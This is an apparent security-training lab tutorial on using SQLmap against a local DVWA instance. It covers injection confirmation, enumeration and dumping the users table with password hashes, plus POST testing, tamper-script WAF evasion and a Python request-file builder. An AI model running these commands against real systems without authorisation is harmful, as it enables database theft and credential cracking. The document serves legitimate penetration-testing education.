⚠️ Authorised Targets Only: SQLmap is a powerful automated attack tool. Use it exclusively against DVWA running on your own local machine, systems you own, or explicitly authorised assessment targets. Running SQLmap against any web application without written authorisation is illegal under computer fraud laws in most jurisdictions.
In Labs 7 and 8 you performed SQL injection manually, building queries by hand, interpreting outputs character by character. That manual approach is essential for understanding the technique. DVWA SQLMAP Lab 12 shows you what happens when you automate it. SQLmap is to SQL injection what Nmap is to port scanning — a tool that compresses hours of manual work into minutes of automated enumeration. One command tests all injection types, identifies the backend database, and begins extracting data. By the end of this lab you will have dumped the entire DVWA user table, including password hashes, using a single terminal workflow. Understanding both manual and automated approaches is what distinguishes a professional web application tester.
🎯 What You’ll Learn in Lab 12
Authenticate SQLmap to DVWA using session cookies
Run SQLmap to confirm SQL injection and identify the backend DBMS
Enumerate databases, tables, and columns automatically
Dump the complete users table including password hashes
Understand when to use SQLmap vs manual injection in professional work
In Lab 11 you extracted data using blind SQL injection — boolean and time-based queries built manually. Lab 12 automates that entire process with SQLmap. Together, Labs 7, 11, and 12 cover the complete SQL injection skill set: manual Union-based, manual blind, and automated exploitation. All three techniques appear in the DVWA Lab Series because professional testers need all three depending on the context.
Getting the Session Cookie — Authenticating SQLmap to DVWA
DVWA requires a logged-in session for all vulnerability modules. SQLmap needs to include the session cookie in every request it makes, otherwise DVWA redirects it to the login page and every test returns a 302 redirect rather than a real response. Getting the cookie takes 30 seconds in DevTools and is required before any SQLmap command will work against DVWA.
GET SESSION COOKIE FROM DVWA
# Step 1: Log into DVWA in your browser
http://localhost/dvwa/login.php
Username: admin | Password: password
# Step 2: Set Security Level to Low
DVWA Security → Low → Submit
# Step 3: Open DevTools (F12) → Application → Cookies → localhost
PHPSESSID = [your session value: a random alphanumeric string whose length depends on the PHP version]
security = low
# Step 4: Put the target URL and both cookies in shell variables so the command below works as written
TARGET="http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit"
COOKIE="PHPSESSID=YOURSESSIONID;security=low"
# Now run SQLmap to confirm connection and injection point
sqlmap -u "$TARGET" --cookie="$COOKIE" -p id --batch --level=1 --risk=1
# --batch = answer all prompts with defaults (no interaction needed)
# -p id = test the 'id' parameter specifically
# --level=1 --risk=1 are the defaults; raise them only if nothing is found at Low
# Expected output includes:
[INFO] GET parameter 'id' is vulnerable
[INFO] the back-end DBMS is MySQL
✅ What you just learned: The --batch flag is essential for automated use — without it, SQLmap pauses to ask confirmation questions at multiple points. The -p id flag directs SQLmap to specifically test the 'id' parameter rather than scanning all parameters (faster for known vulnerable inputs). The confirmed injection and DBMS identification output is the foundation for all subsequent extraction commands — SQLmap optimises its payloads for the specific database type and injection technique it identified in this step.
📸 Screenshot the SQLmap output confirming injection and MySQL backend. Share in #dvwa-labs on Discord.
Confirming Injection and Identifying the DBMS
Once SQLmap confirms the injection point, it identifies the backend DBMS type and version. This matters for subsequent exploitation because different database systems have different system tables, privilege models, and file access mechanisms. MySQL’s information_schema database structure, LOAD_FILE() function, and INTO OUTFILE syntax are MySQL-specific. SQLmap automatically adapts its enumeration and exploitation payloads to the identified DBMS — the tester does not need to manage this differentiation manually.
SQLmap Injection Confirmation Output
[INFO] testing connection to the target URL
[INFO] checking if the target is protected by some kind of WAF/IPS
[INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based' injectable
[INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
---
Parameter: id (GET)
Type: error-based
Type: UNION query
---
[INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
back-end DBMS: MySQL >= 5.0
📸 SQLmap injection confirmation — both error-based and UNION query injection techniques confirmed on the id parameter. Backend identified as MySQL on Linux. SQLmap will now use optimised MySQL-specific payloads for all subsequent enumeration.
Database Enumeration and Full Table Dump
⚡ EXERCISE 2 — DVWA TERMINAL (18 MIN)
Enumerate Databases, Tables, and Dump the Complete Users Table
✅ What you just learned: The four-step enumeration workflow — databases → tables → columns → dump — is the standard SQLmap progression for any SQL injection finding. SQLmap caches results between runs (stored in ~/.local/share/sqlmap/output/), so subsequent commands on the same target are faster. The hash cracking offer at the dump stage uses SQLmap's internal dictionary; for professional engagements, export the hashes and use Hashcat with a full wordlist for better crack rates (DVWA stores unsalted MD5, so hashcat mode 0). The --output-dir flag saves everything in a structured format suitable for report evidence collection.
📸 Screenshot the complete users table dump showing all accounts and cracked passwords. Share in #dvwa-labs on Discord.
Medium Security — POST Parameter Testing
DVWA Medium security changes the SQL injection input from a GET parameter in the URL to a POST parameter submitted via a dropdown form, and it also passes the value through mysqli_real_escape_string(). Escaping only neutralises quote characters: the query still embeds id as an unquoted integer (WHERE user_id = $id), so numeric injection such as 1 OR 1=1 works unchanged. SQLmap handles POST parameters differently: instead of putting the parameter in the URL, you provide the POST body string with --data. The security change is the delivery mechanism and the quoting, not the underlying query structure.
⚡ EXERCISE 3 — DVWA TERMINAL (12 MIN)
Run SQLmap Against DVWA Medium Security — POST Parameter
⏱️ Time: 12 minutes · DVWA at Medium security
MEDIUM SECURITY — POST DATA SQLmap
# Set DVWA to Medium security (DVWA Security → Medium → Submit)
# Update your cookie to reflect the medium security level
COOKIE="PHPSESSID=YOURSESSIONID;security=medium"
# Medium security submits id as POST data, so the URL carries no query string
# and the parameter goes in --data instead
sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/" --cookie="$COOKIE" --data="id=1&Submit=Submit" -p id --batch --dbs
# SQLmap tests the POST id parameter and confirms injection
# Returns the same databases: dvwa, information_schema
# Alternative: capture the request in Burp and save it to a file
sqlmap -r /tmp/sqli_request.txt -p id --batch --dbs
# The -r flag reads a full HTTP request from a file
# Useful for complex requests with many headers/cookies
# How to save the request from Burp:
# Burp Repeater → right-click → Copy to file → save as .txt
# (use the raw request; "Save item" writes Burp's XML wrapper, which -r does not parse)
# SQLmap reads the method, path, headers, cookies and body from the file
✅ What you just learned: The -r (request file) method is the most efficient SQLmap workflow for complex web applications in real assessments. Rather than manually specifying every cookie, header, and POST parameter in flags, you capture the complete request from Burp Suite, save it, and pass it directly to SQLmap. This handles multi-cookie sessions, custom headers (X-Auth-Token, API keys), and complex POST bodies automatically. It also creates perfect documentation — the saved request file is evidence of the exact HTTP request used in the test, directly suitable for inclusion in the penetration test report’s evidence section.
📸 Screenshot SQLmap confirming injection on the POST parameter at Medium security. Share in #dvwa-labs on Discord. Tag #sqlmap2026
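A way to produce the request file without Burp, as an added example that is my code and not part of the original lab: build_request_file writes the raw HTTP/1.1 request that sqlmap -r expects (request line, headers, blank line, body, CRLF line endings, the same shape Burp's Copy to file produces) for both the Low GET form and the Medium POST form, and check_request_file catches the two mistakes that quietly break -r runs after hand-editing: a Content-Length that no longer matches the body and a missing Cookie header, which makes DVWA answer every probe with a redirect to login.php. The session value is a placeholder; substitute the PHPSESSID from DevTools.

```python
"""Generate and sanity-check raw HTTP request files for `sqlmap -r`."""
from urllib.parse import urlencode, urlsplit


def build_request_file(url, cookie, data=None, extra_headers=None):
    """Return the text of a raw HTTP/1.1 request. `data` is a dict of POST
    fields; None means GET. Lines end in CRLF and the body follows one blank
    line, which is what sqlmap's -r parser expects."""
    parts = urlsplit(url)
    path = parts.path or "/"
    if parts.query:
        path += "?" + parts.query
    method = "POST" if data is not None else "GET"
    body = urlencode(data) if data is not None else ""
    headers = [
        ("Host", parts.netloc),
        ("User-Agent", "Mozilla/5.0 (X11; Linux x86_64) lab-client"),
        ("Cookie", cookie),
    ]
    if data is not None:
        headers.append(("Content-Type", "application/x-www-form-urlencoded"))
        headers.append(("Content-Length", str(len(body.encode()))))
    headers.extend((extra_headers or {}).items())
    lines = [f"{method} {path} HTTP/1.1"] + [f"{k}: {v}" for k, v in headers]
    return "\r\n".join(lines) + "\r\n\r\n" + body


def parse_request_file(text):
    """Minimal inverse of build_request_file: returns (method, path, headers,
    body) and raises ValueError on the two errors that most often break -r."""
    head, _, body = text.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    if "Content-Length" in headers and int(headers["Content-Length"]) != len(body.encode()):
        raise ValueError("Content-Length does not match the body")
    if "Cookie" not in headers:
        raise ValueError("no Cookie header: DVWA will redirect every request to login.php")
    return method, path, headers, body


def check_request_file(text):
    """True if the file parses and is consistent; prints the reason otherwise."""
    try:
        parse_request_file(text)
        return True
    except ValueError as exc:
        print(f"request file rejected: {exc}")
        return False


# Placeholder session value (assumption); paste the real PHPSESSID here.
SESSION = "PHPSESSID=0123456789abcdefghijklmnop"

LOW_REQUEST = build_request_file(
    "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit",
    SESSION + ";security=low")

MEDIUM_REQUEST = build_request_file(
    "http://localhost/dvwa/vulnerabilities/sqli/",
    SESSION + ";security=medium",
    data={"id": "1", "Submit": "Submit"})

if __name__ == "__main__":
    # newline="" keeps the CRLF line endings intact on every platform
    with open("/tmp/sqli_request.txt", "w", newline="") as fh:
        fh.write(MEDIUM_REQUEST)
    print(MEDIUM_REQUEST)
    print("# now: sqlmap -r /tmp/sqli_request.txt -p id --batch --dbs")
```

The extra_headers argument is where an X-CSRF-Token or API key goes for applications that need one; keeping the generator in version control alongside the engagement notes gives you the same reproducible evidence a saved Burp request does.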
Manual vs SQLmap — When to Use Each
Professional web application testers use both manual SQL injection and SQLmap, selecting the appropriate approach based on context. Manual injection is essential for: understanding the vulnerability at a technical level (required for accurate reporting), testing blind injection where output confirmation requires interpretation, contexts where automated tool traffic would be obviously anomalous, and WAF evasion where manual payload crafting outperforms automated tamper scripts.
SQLmap is appropriate for: confirming and documenting a known injection point efficiently, bulk extraction from confirmed vulnerabilities, time-critical assessments where manual extraction of large datasets is not feasible, and generating structured output for automated report evidence. The professional standard is to understand manual exploitation thoroughly, use SQLmap for efficiency, and always be able to explain what SQLmap’s payloads are doing when asked by a client or during a debrief.
🧠 QUICK CHECK — Lab 12
You need to use SQLmap against a login form that submits credentials as a POST request with multiple cookies and a custom X-CSRF-Token header. What is the most efficient approach?
📋 SQLmap Lab Reference — Key Commands
sqlmap -u URL --cookie="C" -p id --batch --dbs : List all databases accessible through the injection
(the options below are appended to that base command)
-D dvwa --tables : List tables in the specified database
-D dvwa -T users --columns : List columns in the specified table
-D dvwa -T users --dump : Dump all rows from the table and offer hash cracking
--data="id=1&Submit=Submit" : Test a POST parameter instead of GET
-r request.txt : Read a complete HTTP request from a Burp-saved file
--output-dir=/tmp/evidence/ : Save all results to a directory for report documentation
--tamper=space2comment : Apply a WAF evasion tamper script to payloads
🏆 Mark Lab 12 as Complete
Lab 12 completes the SQL injection series in DVWA — manual union-based (Lab 7), manual blind (Lab 11), and automated extraction (Lab 12). You can now enumerate and dump databases both manually and with SQLmap, and understand when to use each approach in professional assessments.
❓ Frequently Asked Questions
What is SQLmap and what does it do?
Open-source tool that automates SQL injection detection and exploitation. Tests all injection types (boolean blind, time-based, error-based, UNION), identifies the backend DBMS, and automates database enumeration and data extraction. Supports MySQL, PostgreSQL, MSSQL, Oracle, SQLite and more.
Does SQLmap work against DVWA with authentication?
Yes — use --cookie='PHPSESSID=value;security=low' to pass the session cookie. Get the PHPSESSID from DevTools → Application → Cookies after logging in. The security cookie tells DVWA which security level applies.
What is the difference between manual SQL injection and SQLmap?
Manual builds understanding — you craft every payload, interpret every response. SQLmap automates the process — tests all techniques, identifies DBMS, dumps data in minutes. Professionals use both: manual for WAF evasion and precise understanding, SQLmap for confirmed vulnerabilities and bulk extraction.
Can SQLmap bypass WAFs?
Partly — via tamper scripts: --tamper=space2comment, randomcase, charencode, between. Multiple scripts can be chained with commas (--tamper=space2comment,randomcase) and are applied in priority order. Modern behavioural WAFs may still detect the scanning pattern regardless of payload obfuscation, and some tricks are DBMS-specific (inline /**/ comments count as whitespace in MySQL but not everywhere).
What comes after DVWA Lab 12?
Lab 13: DVWA Insecure CAPTCHA — business logic flaw where CAPTCHA verification is bypassed by manipulating the step parameter in the POST request. A completely different vulnerability class from the SQL injection labs.
📚 Further Reading
DVWA Blind SQL Injection Lab 2026: Lab 11 covers the manual blind injection techniques that SQLmap automates in this lab; understanding the manual approach first makes SQLmap's output interpretable.
DVWA SQL Injection Lab 2026: Lab 7 covers foundational manual UNION-based SQL injection, the technique SQLmap detected and used in the error-based/UNION confirmation step.
SQL Injection Complete Guide: the complete SQL injection category, covering all injection types, second-order SQLi, stored procedures, ORM injection, and remediation with parameterised queries across multiple languages.
SQLmap GitHub Repository: the official SQLmap source code, wiki documentation covering all flags and tamper scripts, and the community-maintained list of bypass techniques and advanced usage patterns.
SQLmap Usage Wiki: complete SQLmap flags reference, including all enumeration options, output formats, WAF bypass tamper scripts, and advanced options for complex authentication and request handling scenarios.
Mr Elite
Owner, SecurityElites.com
There is a temptation when learning SQL injection to go straight to SQLmap and skip the manual techniques. I did this early in my career and it created a gap that became obvious during client debriefs. A client’s CTO asked me to explain exactly how the injection worked — what specific SQL was being executed, what output confirmed the vulnerability, why the particular parameter was injectable when adjacent parameters were not. I knew SQLmap had confirmed it. I could not explain the underlying mechanics in the detail the question deserved. I went back, worked through manual blind injection properly, and never had that problem again. SQLmap is a force multiplier. But the force it multiplies is your understanding of SQL injection. Use it after you understand what it is doing, not instead of understanding it. Labs 7 and 11 before Lab 12 — that order exists for a reason.